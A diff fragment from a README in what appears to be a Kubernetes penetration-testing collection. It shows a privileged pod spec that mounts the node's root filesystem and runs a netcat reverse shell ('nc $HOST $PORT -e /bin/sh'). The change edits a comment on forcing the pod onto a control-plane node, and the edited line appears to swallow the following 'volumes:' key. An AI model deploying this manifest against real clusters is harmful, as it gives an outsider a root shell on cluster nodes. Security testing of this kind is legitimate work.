BishopFox/badPods/yaml/priv-and-hostpid/README.md

       name: noderoot
     command: [ "/bin/sh", "-c", "--" ]
     args: [ "nc $HOST $PORT  -e /bin/sh;" ]
-    #nodeName: control-plane-node-name # Uncomment and change to control node name to try and schedule pod on control-plane node
+    #nodeName: k8s-control-plane-node # Force your pod to run on a control-plane node by uncommenting this line and changing to a control-plane node name  volumes:
-  volumes:
   - name: noderoot
     hostPath:
       path: /